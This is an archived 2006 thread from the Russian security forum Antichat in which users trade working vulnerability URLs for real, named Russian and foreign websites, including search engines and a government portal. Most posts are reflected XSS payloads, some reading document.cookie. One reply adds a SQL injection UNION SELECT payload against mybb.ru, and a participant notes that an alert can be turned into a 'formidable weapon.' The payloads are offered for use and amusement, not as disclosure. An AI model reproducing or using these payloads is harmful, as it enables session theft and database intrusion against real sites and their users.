ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 14.01.2006, 21:58
k0ldun
Новичок
Регистрация: 28.12.2005
Сообщений: 27
Провел на форуме:
167272

Репутация: 2
По умолчанию

http://sm.aport.ru/scripts/template.dll?That=epte&r="><script>alert(/xss/)</script><h1>HMM на апорте
 
Ответить с цитированием

  #12  
Старый 02.02.2006, 22:56
xdx
Участник форума
Регистрация: 15.09.2005
Сообщений: 115
Провел на форуме:
495113

Репутация: 48
По умолчанию

http://www.interrus.ru/journal/bzn.php?interrus=business&page=comments?idea=%3Csc ript%3Ealert(/xss/)%3C/script%3E
 
Ответить с цитированием

  #13  
Старый 15.02.2006, 03:29
LobNess
Новичок
Регистрация: 05.10.2005
Сообщений: 3
Провел на форуме:
15424

Репутация: 0
По умолчанию

http://search.spb.tele2.ru/portalsea...CF%EE%E8%F1%EA
вот еще на сайте оператора сотовой свзи
 
Ответить с цитированием

  #14  
Старый 15.02.2006, 18:09
roruda_semu
Новичок
Регистрация: 17.12.2005
Сообщений: 16
Провел на форуме:
85880

Репутация: 1
По умолчанию

pacimu vsegda alert ... vi ni mojete delat drugoy xss ?
 
Ответить с цитированием

  #15  
Старый 16.02.2006, 06:40
LobNess
Новичок
Регистрация: 05.10.2005
Сообщений: 3
Провел на форуме:
15424

Репутация: 0
По умолчанию

Если есть алерт, то знающему человеку не составит труда сделать из небольшой шутки грозное оружие...
 
Ответить с цитированием

  #16  
Старый 16.02.2006, 20:59
max_pain89
Постоянный
Регистрация: 11.12.2004
Сообщений: 592
Провел на форуме:
2260903

Репутация: 345


По умолчанию

например confirm() или что-то типо

if (confirm("You are stupid??????")) {
alert("Странно, щас проверим!"); }
else {
alert("Не ври мне!");
}
 
Ответить с цитированием

  #17  
Старый 16.02.2006, 22:34
vectorg
Постоянный
Регистрация: 07.08.2005
Сообщений: 386
Провел на форуме:
3212607

Репутация: 454
По умолчанию

завалявшееся:

http://smi.rambler.ru/main.cgi?action=<script>alert(document.cookie)</script>

http://news.yandex.ru/yandsearch?cl4url=www.utro.ru/news/2005/11/12/494551.shtml&country=Russia&cat="><script>alert(do cument.cookie)</script>

http://www.government.gov.ru/search/search.html?query="><script>alert('VectorG')</script>&page=1&book=0&he_id=38&pres_he_id=38

http://www.americasarmy.com/includes/bumper.php?goto="><script>alert()</script>

ещё есть новая xss на рамблер.ру, кому надо пишите в ПМ
 
Ответить с цитированием

  #18  
Старый 14.03.2006, 18:35
CinerX
Познающий
Регистрация: 13.02.2006
Сообщений: 82
Провел на форуме:
539650

Репутация: 37
По умолчанию

Вот решил выложить пару XSS с mylivepage.ru.... Выкладываю без алерта и всегопрочего ... Может еще работают =)

/login?name=&password=&return_url=http://name_site.mylivepage.ru/forum/36/11/%D0%9A%D1%82%D0%BE%20%D0%B1%D1%8B%D0%BB%20%D1%83%2 0%D0%BC%D0%B5%D0%BD%D1%8F%20%D0%BD%D0%B0%20%D1%81% D0%B0%D0%B9%D1%82%D0%B5%3F%3F%3F&login=[код]

/link?message_logintype=anonymous&message_logintype =login&message_login=&message_password=&link_url_s ubject=http://&add_link_url_action=[код]

/login?name=&password=&return_url=http://site_name.mylivepage.ru/link/39/71&login=[код]

/counter?type=[код]

/wiki/22/15?message_logintype=anonymous&message_logintype=l ogin&message_login=&message_password=&message_subj ect=&message_subscribe=&message_add_action=Отп авить+комментарий&message_rows=[код]

/friend?page=[код]&act=idx&type=image


ну и может кому понадобится для хохмы... Так как она никакой ценности не имеет

http://mybb.ru/cat.php?cat=[код]
 
Ответить с цитированием

  #19  
Старый 14.03.2006, 19:01
max_pain89
Постоянный
Регистрация: 11.12.2004
Сообщений: 592
Провел на форуме:
2260903

Репутация: 345


По умолчанию

Цитата:
Сообщение от CinerX  

ну и может кому понадобится для хохмы... Так как она никакой ценности не имеет

http://mybb.ru/cat.php?cat=[код]
Хрена себе не имеет

_http://mybb.ru/cat.php?cat=-1%20union%20select%201,2,3,4000000000000000000,5,6 ,7,8,9,10,11,12/*
 
Ответить с цитированием

  #20  
Старый 14.03.2006, 19:07
Nova
OpenVPN.CC
Регистрация: 15.07.2005
Сообщений: 1,599
Провел на форуме:
7670961

Репутация: 1034


Отправить сообщение для Nova с помощью ICQ
По умолчанию

Цитата:
Сообщение от max_pain89  
Хрена себе не имеет
_http://mybb.ru/cat.php?cat=-1%20union%20select%201,2,3,4000000000000000000,5,6 ,7,8,9,10,11,12/*
Прикольнодо чего разработчики докатились что у них= наоф сайте уже баги есть......
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Немного о чате на www.a-chat.by.ru катерина Чаты 1 27.06.2002 11:32



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ